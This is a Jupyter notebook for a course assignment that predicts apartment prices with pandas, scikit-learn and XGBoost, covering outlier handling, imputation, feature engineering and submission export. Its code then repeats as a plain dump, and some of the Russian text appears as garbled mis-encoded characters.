R2 - coefficient of determination (sklearn.metrics.r2_score)
You must achieve R2 > 0.6 on the Private Leaderboard.
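For reference, the coefficient of determination computed by sklearn.metrics.r2_score is

$$R^2 = 1 - \frac{\sum_i (y_i - \hat{y}_i)^2}{\sum_i (y_i - \bar{y})^2},$$

where $\hat{y}_i$ are the model predictions and $\bar{y}$ is the mean of the true target values.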
Note:
All csv files must contain field names (a header row), and the separator must be a comma. The files must not contain the dataframe index.
____________
Recommendations for the code file (ipynb):
1. The file should contain headings and comments
2. Repeated operations are best wrapped in functions
3. Where possible, add plots describing the data (around 3-5)
4. Include only the best model; do not include every attempted variant of the solution in the code
5. The project script must run end to end (from loading the data to exporting the predictions)
6. The whole project must live in a single script (ipynb file).
7. When statistics (mean, median, etc.) are used as features, compute them on the training set and then reuse those training statistics on the validation and test data instead of recomputing them (a short sketch follows this list).
8. The project must run completely within a reasonable time (no more than 10 minutes), so it is better not to include a GridSearch over a large number of parameter combinations in the final version.
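A minimal sketch of recommendation 7, assuming a hypothetical numeric column with missing values; the statistic is computed once on the training split and then reused:
```
import pandas as pd

# Hypothetical data: the median is computed on the training split only
train = pd.DataFrame({'LifeSquare': [30.0, None, 45.0, 52.0]})
test = pd.DataFrame({'LifeSquare': [None, 38.0]})

train_medians = train.median()        # computed once, on train
train = train.fillna(train_medians)
test = test.fillna(train_medians)     # reused on validation/test, not recomputed
```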
**Lesson plan**
* [Loading the data](#load)
* [1. EDA](#eda)
* [2. Outlier handling](#outlier)
* [3. Missing value handling](#nan)
* [4. Feature engineering](#feature)
* [5. Feature selection](#feature_selection)
* [6. Train/test split](#split)
* [7. Model building](#modeling)
* [8. Prediction on the test dataset](#prediction)
**Importing libraries and scripts**
```
import numpy as np
import pandas as pd
import random
from sklearn.model_selection import train_test_split, cross_val_score
from sklearn.preprocessing import StandardScaler, RobustScaler
from sklearn.ensemble import RandomForestRegressor
from sklearn.metrics import r2_score as r2
from sklearn.model_selection import KFold, GridSearchCV
from datetime import datetime
import matplotlib
import matplotlib.pyplot as plt
import seaborn as sns
%matplotlib inline
import warnings
warnings.filterwarnings('ignore')
matplotlib.rcParams.update({'font.size': 14})
def evaluate_preds(train_true_values, train_pred_values, test_true_values, test_pred_values):
print("Train R2:\t" + str(round(r2(train_true_values, train_pred_values), 3)))
print("Test R2:\t" + str(round(r2(test_true_values, test_pred_values), 3)))
plt.figure(figsize=(18,10))
plt.subplot(121)
sns.scatterplot(x=train_pred_values, y=train_true_values)
plt.xlabel('Predicted values')
plt.ylabel('True values')
plt.title('Train sample prediction')
plt.subplot(122)
sns.scatterplot(x=test_pred_values, y=test_true_values)
plt.xlabel('Predicted values')
plt.ylabel('True values')
plt.title('Test sample prediction')
plt.show()
```
**Paths to directories and files**
```
TRAIN_DATASET_PATH = 'train.csv'
TEST_DATASET_PATH = 'test.csv'
```
### Loading the data <a class='anchor' id='load'>
**Dataset description**
* **Id** - unique apartment identifier
* **DistrictId** - district identifier
* **Rooms** - number of rooms
* **Square** - total area
* **LifeSquare** - living area
* **KitchenSquare** - kitchen area
* **Floor** - floor of the apartment
* **HouseFloor** - number of floors in the building
* **HouseYear** - year the building was constructed
* **Ecology_1, Ecology_2, Ecology_3** - environmental indicators of the area
* **Social_1, Social_2, Social_3** - social indicators of the area
* **Healthcare_1, Helthcare_2** - healthcare-related indicators of the area
* **Shops_1, Shops_2** - indicators related to the presence of shops and shopping centers
* **Price** - apartment price
```
train_df = pd.read_csv(TRAIN_DATASET_PATH)
train_df.tail()
train_df.dtypes
test_df = pd.read_csv(TEST_DATASET_PATH)
test_df.tail()
print('ะกััะพะบ ะฒ ััะตะฝะธัะพะฒะพัะฝะพะผ ะฝะฐะฑะพัะต :\t', train_df.shape[0])
print('ะกััะพะบ ะฒ ัะตััะพะฒะพะผ ะฝะฐะฑะพัะต :\t', test_df.shape[0])
train_df.shape[1] - 1 == test_df.shape[1]
```
### Type conversion
```
train_df.dtypes
```
>The Id field is a unique apartment identifier and carries no information useful to the model
```
train_df['Id'] = train_df['Id'].astype(str)
#train_df['DistrictId'] = train_df['DistrictId'].astype(str)
```
## 1. EDA <a class='anchor' id='eda'>
- Data analysis
- Outlier correction
- Filling NaNs
- Ideas for generating new features
**Target variable**
```
train_df.Price.describe()
plt.figure(figsize = (16, 8))
train_df['Price'].hist(bins=30)
plt.ylabel('Count')
plt.xlabel('Price')
plt.title('Target distribution')
plt.show()
```
**Numerical variables**
```
train_df.describe()
```
**Categorical variables**
```
train_df.select_dtypes(include='object').columns.tolist()
train_df['DistrictId'].value_counts()
train_df['Ecology_2'].value_counts()
train_df['Ecology_3'].value_counts()
train_df['Shops_2'].value_counts()
```
### 2. Outlier handling <a class='anchor' id='outlier'>
What can we do with them?
1. Drop these rows (only on the training set; nothing is dropped from the test set)
2. Replace the outliers using various methods (medians, means, np.clip, etc.); a short sketch follows this list
3. Optionally add an extra indicator feature marking the outliers
4. Do nothing
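A minimal sketch of option 2, using np.clip on a hypothetical series: values outside the 2.5-97.5 percentile range are capped.
```
import numpy as np
import pandas as pd

# Hypothetical series with one extreme value
s = pd.Series([1.0, 2.0, 3.0, 250.0, 4.0, 5.0])
lower, upper = s.quantile(0.025), s.quantile(0.975)
s_capped = pd.Series(np.clip(s, lower, upper))   # the extreme value is pulled back to the upper bound
```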
**Rooms**
```
train_df['Rooms'].value_counts()
```
>For Rooms, values of 6 or more are treated as outliers and 0 as a missing value
```
train_df[train_df['Rooms'] == 0]
train_df['Rooms_outlier'] = 0
train_df.loc[(train_df['Rooms'] == 0) | (train_df['Rooms'] >= 6), 'Rooms_outlier'] = 1
train_df.head()
train_df[train_df['Rooms'] > 6 ]
```
> Rooms correction
```
train_df.loc[train_df['Rooms'] == 0, 'Rooms'] = 1
train_df.loc[train_df['Rooms'] >= 6, 'Rooms'] = train_df['Rooms'].median()
train_df['Rooms'].value_counts()
```
**KitchenSquare**
```
train_df['KitchenSquare'].value_counts()
train_df['KitchenSquare'].quantile(.975), train_df['KitchenSquare'].quantile(.025)
```
>Consistency check
```
train_df[train_df.KitchenSquare > train_df.Square]
```
> We treat as outliers:
>1. missing values and everything above the 97.5th percentile
>2. values below 3
KitchenSquare correction
```
condition = (train_df['KitchenSquare'].isna()) \
| (train_df['KitchenSquare'] > train_df['KitchenSquare'].quantile(.975))
train_df.loc[condition, 'KitchenSquare'] = train_df['KitchenSquare'].median()
train_df.loc[train_df['KitchenSquare'] < 3, 'KitchenSquare'] = 3
train_df['KitchenSquare'].value_counts()
```
>Repeat the consistency check
```
train_df[train_df.KitchenSquare > train_df.Square]
```
**HouseFloor, Floor**
```
train_df['HouseFloor'].sort_values().unique()
train_df['Floor'].sort_values().unique()
(train_df['Floor'] > train_df['HouseFloor']).sum()
```
> We treat as anomalies:
> Floor > HouseFloor
> HouseFloor = 0
```
train_df['HouseFloor_outlier'] = 0
train_df.loc[train_df['HouseFloor'] == 0, 'HouseFloor_outlier'] = 1
train_df.loc[train_df['Floor'] > train_df['HouseFloor'], 'HouseFloor_outlier'] = 1
train_df.loc[train_df['HouseFloor'] == 0, 'HouseFloor'] = train_df['HouseFloor'].median()
floor_outliers = train_df.loc[train_df['Floor'] > train_df['HouseFloor']].index
floor_outliers
```
> Regenerate the Floor feature within the range [1, HouseFloor]
```
train_df.loc[floor_outliers, 'Floor'] = train_df.loc[floor_outliers, 'HouseFloor']\
.apply(lambda x: random.randint(1, x))
(train_df['Floor'] > train_df['HouseFloor']).sum()
```
**HouseYear**
```
train_df['HouseYear'].sort_values(ascending=False)
train_df[train_df['HouseYear'] > 2020]
train_df.loc[train_df['HouseYear'] > 2020, 'HouseYear'] = 2020
```
### 3. Missing value handling <a class='anchor' id='nan'>
```
train_df.isna().sum()
```
>Missing values in LifeSquare and Healthcare_1
```
train_df[['Square', 'LifeSquare', 'KitchenSquare']].head(10)
```
**LifeSquare**
> Flag the rows where LifeSquare is missing
```
train_df['LifeSquare_nan'] = train_df['LifeSquare'].isna() * 1
```
> Impute LifeSquare = Square - KitchenSquare - 3
```
condition = (train_df['LifeSquare'].isna()) \
& (~train_df['Square'].isna()) \
& (~train_df['KitchenSquare'].isna())
train_df.loc[condition, 'LifeSquare'] = train_df.loc[condition, 'Square'] \
- train_df.loc[condition, 'KitchenSquare'] - 3
```
**Healthcare_1**
>The Healthcare_1 feature has many missing values (about 50%) and no recoverable logic, so it cannot be reconstructed. It will most likely have to be dropped.
```
train_df.Healthcare_1.isna().sum(), train_df.shape[0]
train_df.drop('Healthcare_1', axis=1, inplace=True)
class DataPreprocessing:
"""ะะพะดะณะพัะพะฒะบะฐ ะธัั
ะพะดะฝัั
ะดะฐะฝะฝัั
"""
def __init__(self):
"""ะะฐัะฐะผะตััั ะบะปะฐััะฐ"""
self.medians=None
self.kitchen_square_quantile = None
def fit(self, X):
"""ะกะพั
ัะฐะฝะตะฝะธะต ััะฐัะธััะธะบ"""
# ะ ะฐััะตั ะผะตะดะธะฐะฝ
self.medians = X.median()
self.kitchen_square_quantile = X['KitchenSquare'].quantile(.975)
def transform(self, X):
"""ะขัะฐะฝััะพัะผะฐัะธั ะดะฐะฝะฝัั
"""
# Rooms
X['Rooms_outlier'] = 0
X.loc[(X['Rooms'] == 0) | (X['Rooms'] >= 6), 'Rooms_outlier'] = 1
X.loc[X['Rooms'] == 0, 'Rooms'] = 1
X.loc[X['Rooms'] >= 6, 'Rooms'] = self.medians['Rooms']
# KitchenSquare
condition = (X['KitchenSquare'].isna()) \
| (X['KitchenSquare'] > self.kitchen_square_quantile)
X.loc[condition, 'KitchenSquare'] = self.medians['KitchenSquare']
X.loc[X['KitchenSquare'] < 3, 'KitchenSquare'] = 3
# HouseFloor, Floor
X['HouseFloor_outlier'] = 0
X.loc[X['HouseFloor'] == 0, 'HouseFloor_outlier'] = 1
X.loc[X['Floor'] > X['HouseFloor'], 'HouseFloor_outlier'] = 1
X.loc[X['HouseFloor'] == 0, 'HouseFloor'] = self.medians['HouseFloor']
floor_outliers = X.loc[X['Floor'] > X['HouseFloor']].index
X.loc[floor_outliers, 'Floor'] = X.loc[floor_outliers, 'HouseFloor']\
.apply(lambda x: random.randint(1, x))
# HouseYear
current_year = datetime.now().year
X['HouseYear_outlier'] = 0
X.loc[X['HouseYear'] > current_year, 'HouseYear_outlier'] = 1
X.loc[X['HouseYear'] > current_year, 'HouseYear'] = current_year
# Healthcare_1
if 'Healthcare_1' in X.columns:
X.drop('Healthcare_1', axis=1, inplace=True)
# LifeSquare
X['LifeSquare_nan'] = X['LifeSquare'].isna() * 1
condition = (X['LifeSquare'].isna()) & \
(~X['Square'].isna()) & \
(~X['KitchenSquare'].isna())
X.loc[condition, 'LifeSquare'] = X.loc[condition, 'Square'] - X.loc[condition, 'KitchenSquare'] - 3
X.fillna(self.medians, inplace=True)
return X
```
### 4. Feature engineering <a class='anchor' id='feature'>
**Dummies**
>Convert the string columns to int
```
train_df[['Ecology_2', 'Ecology_3', 'Shops_2']]
binary_to_numbers = {'A': 0, 'B': 1}
train_df['Ecology_2'] = train_df['Ecology_2'].replace(binary_to_numbers)
train_df['Ecology_3'] = train_df['Ecology_3'].replace(binary_to_numbers)
train_df['Shops_2'] = train_df['Shops_2'].replace(binary_to_numbers)
train_df[['Ecology_2', 'Ecology_3', 'Shops_2']]
```
**DistrictSize, IsDistrictLarge**
```
district_size = train_df['DistrictId'].value_counts().reset_index()\
.rename(columns={'index':'DistrictId', 'DistrictId':'DistrictSize'})
district_size.head()
train_df = train_df.merge(district_size, on='DistrictId', how='left')
train_df.head()
(train_df['DistrictSize'] > 100).value_counts()
train_df['IsDistrictLarge'] = (train_df['DistrictSize'] > 100).astype(int)
```
**MedPriceByDistrict**
```
med_price_by_district = train_df.groupby(['DistrictId', 'Rooms'], as_index=False).agg({'Price':'median'})\
.rename(columns={'Price':'MedPriceByDistrict'})
med_price_by_district.head()
train_df = train_df.merge(med_price_by_district, on=['DistrictId', 'Rooms'], how='left')
train_df.head()
```
**MedPriceByFloorYear**
```
def floor_to_cat(X):
X['floor_cat'] = 0
X.loc[X['Floor'] <= 3, 'floor_cat'] = 1
X.loc[(X['Floor'] > 3) & (X['Floor'] <= 5), 'floor_cat'] = 2
X.loc[(X['Floor'] > 5) & (X['Floor'] <= 9), 'floor_cat'] = 3
X.loc[(X['Floor'] > 9) & (X['Floor'] <= 15), 'floor_cat'] = 4
X.loc[X['Floor'] > 15, 'floor_cat'] = 5
return X
def floor_to_cat_pandas(X):
bins = [0, 3, 5, 9, 15, X['Floor'].max()]
X['floor_cat'] = pd.cut(X['Floor'], bins=bins, labels=False)
X['floor_cat'].fillna(-1, inplace=True)
return X
def year_to_cat(X):
X['year_cat'] = 0
X.loc[X['HouseYear'] <= 1941, 'year_cat'] = 1
X.loc[(X['HouseYear'] > 1941) & (X['HouseYear'] <= 1945), 'year_cat'] = 2
X.loc[(X['HouseYear'] > 1945) & (X['HouseYear'] <= 1980), 'year_cat'] = 3
X.loc[(X['HouseYear'] > 1980) & (X['HouseYear'] <= 2000), 'year_cat'] = 4
X.loc[(X['HouseYear'] > 2000) & (X['HouseYear'] <= 2010), 'year_cat'] = 5
X.loc[(X['HouseYear'] > 2010), 'year_cat'] = 6
return X
def year_to_cat_pandas(X):
bins = [0, 1941, 1945, 1980, 2000, 2010, X['HouseYear'].max()]
X['year_cat'] = pd.cut(X['HouseYear'], bins=bins, labels=False)
X['year_cat'].fillna(-1, inplace=True)
return X
bins = [0, 3, 5, 9, 15, train_df['Floor'].max()]
pd.cut(train_df['Floor'], bins=bins, labels=False)
bins = [0, 3, 5, 9, 15, train_df['Floor'].max()]
pd.cut(train_df['Floor'], bins=bins)
train_df = year_to_cat(train_df)
train_df = floor_to_cat(train_df)
train_df.head()
med_price_by_floor_year = train_df.groupby(['year_cat', 'floor_cat'], as_index=False).agg({'Price':'median'}).\
rename(columns={'Price':'MedPriceByFloorYear'})
med_price_by_floor_year.head()
train_df = train_df.merge(med_price_by_floor_year, on=['year_cat', 'floor_cat'], how='left')
train_df.head()
class FeatureGenetator():
"""ะะตะฝะตัะฐัะธั ะฝะพะฒัั
ัะธั"""
def __init__(self):
self.DistrictId_counts = None
self.binary_to_numbers = None
self.med_price_by_district = None
self.med_price_by_floor_year = None
self.house_year_max = None
self.floor_max = None
def fit(self, X, y=None):
X = X.copy()
# Binary features
self.binary_to_numbers = {'A': 0, 'B': 1}
# DistrictID
self.district_size = X['DistrictId'].value_counts().reset_index() \
.rename(columns={'index':'DistrictId', 'DistrictId':'DistrictSize'})
# Target encoding
## District, Rooms
df = X.copy()
if y is not None:
df['Price'] = y.values
self.med_price_by_district = df.groupby(['DistrictId', 'Rooms'], as_index=False).agg({'Price':'median'})\
.rename(columns={'Price':'MedPriceByDistrict'})
self.med_price_by_district_median = self.med_price_by_district['MedPriceByDistrict'].median()
## floor, year
if y is not None:
self.floor_max = df['Floor'].max()
self.house_year_max = df['HouseYear'].max()
df['Price'] = y.values
df = self.floor_to_cat(df)
df = self.year_to_cat(df)
self.med_price_by_floor_year = df.groupby(['year_cat', 'floor_cat'], as_index=False).agg({'Price':'median'}).\
rename(columns={'Price':'MedPriceByFloorYear'})
self.med_price_by_floor_year_median = self.med_price_by_floor_year['MedPriceByFloorYear'].median()
def transform(self, X):
# Binary features
X['Ecology_2'] = X['Ecology_2'].map(self.binary_to_numbers) # self.binary_to_numbers = {'A': 0, 'B': 1}
X['Ecology_3'] = X['Ecology_3'].map(self.binary_to_numbers)
X['Shops_2'] = X['Shops_2'].map(self.binary_to_numbers)
# DistrictId, IsDistrictLarge
X = X.merge(self.district_size, on='DistrictId', how='left')
X['new_district'] = 0
X.loc[X['DistrictSize'].isna(), 'new_district'] = 1
X['DistrictSize'].fillna(5, inplace=True)
X['IsDistrictLarge'] = (X['DistrictSize'] > 100).astype(int)
# More categorical features
X = self.floor_to_cat(X) # + ััะพะปะฑะตั floor_cat
X = self.year_to_cat(X) # + ััะพะปะฑะตั year_cat
# Target encoding
if self.med_price_by_district is not None:
X = X.merge(self.med_price_by_district, on=['DistrictId', 'Rooms'], how='left')
X.fillna(self.med_price_by_district_median, inplace=True)
if self.med_price_by_floor_year is not None:
X = X.merge(self.med_price_by_floor_year, on=['year_cat', 'floor_cat'], how='left')
X.fillna(self.med_price_by_floor_year_median, inplace=True)
return X
def floor_to_cat(self, X):
bins = [0, 3, 5, 9, 15, self.floor_max]
X['floor_cat'] = pd.cut(X['Floor'], bins=bins, labels=False)
X['floor_cat'].fillna(-1, inplace=True)
return X
def year_to_cat(self, X):
bins = [0, 1941, 1945, 1980, 2000, 2010, self.house_year_max]
X['year_cat'] = pd.cut(X['HouseYear'], bins=bins, labels=False)
X['year_cat'].fillna(-1, inplace=True)
return X
```
### 5. Feature selection <a class='anchor' id='feature_selection'>
```
train_df.columns.tolist()
feature_names = ['Rooms', 'Square', 'LifeSquare', 'KitchenSquare', 'Floor', 'HouseFloor', 'HouseYear',
'Ecology_1', 'Ecology_2', 'Ecology_3', 'Social_1', 'Social_2', 'Social_3',
'Helthcare_2', 'Shops_1', 'Shops_2']
new_feature_names = ['Rooms_outlier', 'HouseFloor_outlier', 'HouseYear_outlier', 'LifeSquare_nan', 'DistrictSize',
'new_district', 'IsDistrictLarge', 'MedPriceByDistrict', 'MedPriceByFloorYear']
target_name = 'Price'
```
### 6. Train/test split <a class='anchor' id='split'>
```
train_df = pd.read_csv(TRAIN_DATASET_PATH)
test_df = pd.read_csv(TEST_DATASET_PATH)
X = train_df.drop(columns=target_name)
y = train_df[target_name]
X_train, X_valid, y_train, y_valid = train_test_split(X, y, test_size=0.33, shuffle=True, random_state=21)
preprocessor = DataPreprocessing()
preprocessor.fit(X_train)
X_train = preprocessor.transform(X_train)
X_valid = preprocessor.transform(X_valid)
test_df = preprocessor.transform(test_df)
X_train.shape, X_valid.shape, test_df.shape
features_gen = FeatureGenetator()
features_gen.fit(X_train, y_train)
X_train = features_gen.transform(X_train)
X_valid = features_gen.transform(X_valid)
test_df = features_gen.transform(test_df)
X_train.shape, X_valid.shape, test_df.shape
X_train = X_train[feature_names + new_feature_names]
X_valid = X_valid[feature_names + new_feature_names]
test_df = test_df[feature_names + new_feature_names]
X_train.isna().sum().sum(), X_valid.isna().sum().sum(), test_df.isna().sum().sum()
```
### 7. Model building <a class='anchor' id='modeling'>
**Training**
**xgboost**
```
import xgboost as xgb
from xgboost_autotune import fit_parameters
from sklearn.metrics import make_scorer, accuracy_score
best_xgb_model = xgb.XGBRegressor(colsample_bytree=0.4,
gamma=0,
learning_rate=0.08,
max_depth=8,
min_child_weight=1.5,
# 10000
n_estimators=300,
reg_alpha=0.75,
reg_lambda=0.45,
subsample=0.6,
seed=42)
best_xgb_model.fit(X_train,y_train)
y_train_preds = best_xgb_model.predict(X_train)
y_test_preds = best_xgb_model.predict(X_valid)
evaluate_preds(y_train, y_train_preds, y_valid, y_test_preds)
```
**RandomForestRegressor**
```
rf_model = RandomForestRegressor(random_state=21, criterion='mse')
rf_model.fit(X_train, y_train)
```
**Model evaluation**
```
y_train_preds = rf_model.predict(X_train)
y_test_preds = rf_model.predict(X_valid)
evaluate_preds(y_train, y_train_preds, y_valid, y_test_preds)
```
**Cross-validation**
```
cv_score = cross_val_score(rf_model, X_train, y_train, scoring='r2', cv=KFold(n_splits=3, shuffle=True, random_state=21))
cv_score
cv_score.mean()
```
**Feature importance**
```
feature_importances = pd.DataFrame(list(zip(X_train.columns, rf_model.feature_importances_)),
columns=['feature_name', 'importance'])
feature_importances.sort_values(by='importance', ascending=False)
```
An idea for more complex models:
```
from sklearn.ensemble import StackingRegressor, VotingRegressor, BaggingRegressor, GradientBoostingRegressor
from sklearn.linear_model import LinearRegression
lr = LinearRegression()
gb = GradientBoostingRegressor()
stack = StackingRegressor([('lr', lr), ('rf', rf_model)], final_estimator=gb)
stack.fit(X_train, y_train)
y_train_preds = stack.predict(X_train)
y_test_preds = stack.predict(X_valid)
evaluate_preds(y_train, y_train_preds, y_valid, y_test_preds)
```
### 8. Prediction on the test dataset <a class='anchor' id='prediction'>
1. Apply the same preprocessing and feature-engineering steps to the test dataset
2. Do not lose or shuffle the example indices when building the predictions
3. Predictions must be produced for every example in the test dataset (for all rows)
```
test_df.shape
test_df
submit = pd.read_csv('sample_submission.csv')
submit.head()
best_xgb_model
# predictions = rf_model.predict(test_df)
predictions = best_xgb_model.predict(test_df)
predictions
submit['Price'] = predictions
submit.head()
submit.to_csv('rf_submit.csv', index=False)
```
|
github_jupyter
|
import numpy as np
import pandas as pd
import random
from sklearn.model_selection import train_test_split, cross_val_score
from sklearn.preprocessing import StandardScaler, RobustScaler
from sklearn.ensemble import RandomForestRegressor
from sklearn.metrics import r2_score as r2
from sklearn.model_selection import KFold, GridSearchCV
from datetime import datetime
import matplotlib
import matplotlib.pyplot as plt
import seaborn as sns
%matplotlib inline
import warnings
warnings.filterwarnings('ignore')
matplotlib.rcParams.update({'font.size': 14})
def evaluate_preds(train_true_values, train_pred_values, test_true_values, test_pred_values):
print("Train R2:\t" + str(round(r2(train_true_values, train_pred_values), 3)))
print("Test R2:\t" + str(round(r2(test_true_values, test_pred_values), 3)))
plt.figure(figsize=(18,10))
plt.subplot(121)
sns.scatterplot(x=train_pred_values, y=train_true_values)
plt.xlabel('Predicted values')
plt.ylabel('True values')
plt.title('Train sample prediction')
plt.subplot(122)
sns.scatterplot(x=test_pred_values, y=test_true_values)
plt.xlabel('Predicted values')
plt.ylabel('True values')
plt.title('Test sample prediction')
plt.show()
TRAIN_DATASET_PATH = 'train.csv'
TEST_DATASET_PATH = 'test.csv'
train_df = pd.read_csv(TRAIN_DATASET_PATH)
train_df.tail()
train_df.dtypes
test_df = pd.read_csv(TEST_DATASET_PATH)
test_df.tail()
print('ะกััะพะบ ะฒ ััะตะฝะธัะพะฒะพัะฝะพะผ ะฝะฐะฑะพัะต :\t', train_df.shape[0])
print('ะกััะพะบ ะฒ ัะตััะพะฒะพะผ ะฝะฐะฑะพัะต :\t', test_df.shape[0])
train_df.shape[1] - 1 == test_df.shape[1]
train_df.dtypes
train_df['Id'] = train_df['Id'].astype(str)
#train_df['DistrictId'] = train_df['DistrictId'].astype(str)
train_df.Price.describe()
plt.figure(figsize = (16, 8))
train_df['Price'].hist(bins=30)
plt.ylabel('Count')
plt.xlabel('Price')
plt.title('Target distribution')
plt.show()
train_df.describe()
train_df.select_dtypes(include='object').columns.tolist()
train_df['DistrictId'].value_counts()
train_df['Ecology_2'].value_counts()
train_df['Ecology_3'].value_counts()
train_df['Shops_2'].value_counts()
train_df['Rooms'].value_counts()
train_df[train_df['Rooms'] == 0]
train_df['Rooms_outlier'] = 0
train_df.loc[(train_df['Rooms'] == 0) | (train_df['Rooms'] >= 6), 'Rooms_outlier'] = 1
train_df.head()
train_df[train_df['Rooms'] > 6 ]
train_df.loc[train_df['Rooms'] == 0, 'Rooms'] = 1
train_df.loc[train_df['Rooms'] >= 6, 'Rooms'] = train_df['Rooms'].median()
train_df['Rooms'].value_counts()
train_df['KitchenSquare'].value_counts()
train_df['KitchenSquare'].quantile(.975), train_df['KitchenSquare'].quantile(.025)
train_df[train_df.KitchenSquare > train_df.Square]
condition = (train_df['KitchenSquare'].isna()) \
| (train_df['KitchenSquare'] > train_df['KitchenSquare'].quantile(.975))
train_df.loc[condition, 'KitchenSquare'] = train_df['KitchenSquare'].median()
train_df.loc[train_df['KitchenSquare'] < 3, 'KitchenSquare'] = 3
train_df['KitchenSquare'].value_counts()
train_df[train_df.KitchenSquare > train_df.Square]
train_df['HouseFloor'].sort_values().unique()
train_df['Floor'].sort_values().unique()
(train_df['Floor'] > train_df['HouseFloor']).sum()
train_df['HouseFloor_outlier'] = 0
train_df.loc[train_df['HouseFloor'] == 0, 'HouseFloor_outlier'] = 1
train_df.loc[train_df['Floor'] > train_df['HouseFloor'], 'HouseFloor_outlier'] = 1
train_df.loc[train_df['HouseFloor'] == 0, 'HouseFloor'] = train_df['HouseFloor'].median()
floor_outliers = train_df.loc[train_df['Floor'] > train_df['HouseFloor']].index
floor_outliers
train_df.loc[floor_outliers, 'Floor'] = train_df.loc[floor_outliers, 'HouseFloor']\
.apply(lambda x: random.randint(1, x))
(train_df['Floor'] > train_df['HouseFloor']).sum()
train_df['HouseYear'].sort_values(ascending=False)
train_df[train_df['HouseYear'] > 2020]
train_df.loc[train_df['HouseYear'] > 2020, 'HouseYear'] = 2020
train_df.isna().sum()
train_df[['Square', 'LifeSquare', 'KitchenSquare']].head(10)
train_df['LifeSquare_nan'] = train_df['LifeSquare'].isna() * 1
condition = (train_df['LifeSquare'].isna()) \
& (~train_df['Square'].isna()) \
& (~train_df['KitchenSquare'].isna())
train_df.loc[condition, 'LifeSquare'] = train_df.loc[condition, 'Square'] \
- train_df.loc[condition, 'KitchenSquare'] - 3
train_df.Healthcare_1.isna().sum(), train_df.shape[0]
train_df.drop('Healthcare_1', axis=1, inplace=True)
class DataPreprocessing:
"""ะะพะดะณะพัะพะฒะบะฐ ะธัั
ะพะดะฝัั
ะดะฐะฝะฝัั
"""
def __init__(self):
"""ะะฐัะฐะผะตััั ะบะปะฐััะฐ"""
self.medians=None
self.kitchen_square_quantile = None
def fit(self, X):
"""ะกะพั
ัะฐะฝะตะฝะธะต ััะฐัะธััะธะบ"""
# ะ ะฐััะตั ะผะตะดะธะฐะฝ
self.medians = X.median()
self.kitchen_square_quantile = X['KitchenSquare'].quantile(.975)
def transform(self, X):
"""ะขัะฐะฝััะพัะผะฐัะธั ะดะฐะฝะฝัั
"""
# Rooms
X['Rooms_outlier'] = 0
X.loc[(X['Rooms'] == 0) | (X['Rooms'] >= 6), 'Rooms_outlier'] = 1
X.loc[X['Rooms'] == 0, 'Rooms'] = 1
X.loc[X['Rooms'] >= 6, 'Rooms'] = self.medians['Rooms']
# KitchenSquare
condition = (X['KitchenSquare'].isna()) \
| (X['KitchenSquare'] > self.kitchen_square_quantile)
X.loc[condition, 'KitchenSquare'] = self.medians['KitchenSquare']
X.loc[X['KitchenSquare'] < 3, 'KitchenSquare'] = 3
# HouseFloor, Floor
X['HouseFloor_outlier'] = 0
X.loc[X['HouseFloor'] == 0, 'HouseFloor_outlier'] = 1
X.loc[X['Floor'] > X['HouseFloor'], 'HouseFloor_outlier'] = 1
X.loc[X['HouseFloor'] == 0, 'HouseFloor'] = self.medians['HouseFloor']
floor_outliers = X.loc[X['Floor'] > X['HouseFloor']].index
X.loc[floor_outliers, 'Floor'] = X.loc[floor_outliers, 'HouseFloor']\
.apply(lambda x: random.randint(1, x))
# HouseYear
current_year = datetime.now().year
X['HouseYear_outlier'] = 0
X.loc[X['HouseYear'] > current_year, 'HouseYear_outlier'] = 1
X.loc[X['HouseYear'] > current_year, 'HouseYear'] = current_year
# Healthcare_1
if 'Healthcare_1' in X.columns:
X.drop('Healthcare_1', axis=1, inplace=True)
# LifeSquare
X['LifeSquare_nan'] = X['LifeSquare'].isna() * 1
condition = (X['LifeSquare'].isna()) & \
(~X['Square'].isna()) & \
(~X['KitchenSquare'].isna())
X.loc[condition, 'LifeSquare'] = X.loc[condition, 'Square'] - X.loc[condition, 'KitchenSquare'] - 3
X.fillna(self.medians, inplace=True)
return X
train_df[['Ecology_2', 'Ecology_3', 'Shops_2']]
binary_to_numbers = {'A': 0, 'B': 1}
train_df['Ecology_2'] = train_df['Ecology_2'].replace(binary_to_numbers)
train_df['Ecology_3'] = train_df['Ecology_3'].replace(binary_to_numbers)
train_df['Shops_2'] = train_df['Shops_2'].replace(binary_to_numbers)
train_df[['Ecology_2', 'Ecology_3', 'Shops_2']]
district_size = train_df['DistrictId'].value_counts().reset_index()\
.rename(columns={'index':'DistrictId', 'DistrictId':'DistrictSize'})
district_size.head()
train_df = train_df.merge(district_size, on='DistrictId', how='left')
train_df.head()
(train_df['DistrictSize'] > 100).value_counts()
train_df['IsDistrictLarge'] = (train_df['DistrictSize'] > 100).astype(int)
med_price_by_district = train_df.groupby(['DistrictId', 'Rooms'], as_index=False).agg({'Price':'median'})\
.rename(columns={'Price':'MedPriceByDistrict'})
med_price_by_district.head()
train_df = train_df.merge(med_price_by_district, on=['DistrictId', 'Rooms'], how='left')
train_df.head()
def floor_to_cat(X):
X['floor_cat'] = 0
X.loc[X['Floor'] <= 3, 'floor_cat'] = 1
X.loc[(X['Floor'] > 3) & (X['Floor'] <= 5), 'floor_cat'] = 2
X.loc[(X['Floor'] > 5) & (X['Floor'] <= 9), 'floor_cat'] = 3
X.loc[(X['Floor'] > 9) & (X['Floor'] <= 15), 'floor_cat'] = 4
X.loc[X['Floor'] > 15, 'floor_cat'] = 5
return X
def floor_to_cat_pandas(X):
bins = [0, 3, 5, 9, 15, X['Floor'].max()]
X['floor_cat'] = pd.cut(X['Floor'], bins=bins, labels=False)
X['floor_cat'].fillna(-1, inplace=True)
return X
def year_to_cat(X):
X['year_cat'] = 0
X.loc[X['HouseYear'] <= 1941, 'year_cat'] = 1
X.loc[(X['HouseYear'] > 1941) & (X['HouseYear'] <= 1945), 'year_cat'] = 2
X.loc[(X['HouseYear'] > 1945) & (X['HouseYear'] <= 1980), 'year_cat'] = 3
X.loc[(X['HouseYear'] > 1980) & (X['HouseYear'] <= 2000), 'year_cat'] = 4
X.loc[(X['HouseYear'] > 2000) & (X['HouseYear'] <= 2010), 'year_cat'] = 5
X.loc[(X['HouseYear'] > 2010), 'year_cat'] = 6
return X
def year_to_cat_pandas(X):
bins = [0, 1941, 1945, 1980, 2000, 2010, X['HouseYear'].max()]
X['year_cat'] = pd.cut(X['HouseYear'], bins=bins, labels=False)
X['year_cat'].fillna(-1, inplace=True)
return X
bins = [0, 3, 5, 9, 15, train_df['Floor'].max()]
pd.cut(train_df['Floor'], bins=bins, labels=False)
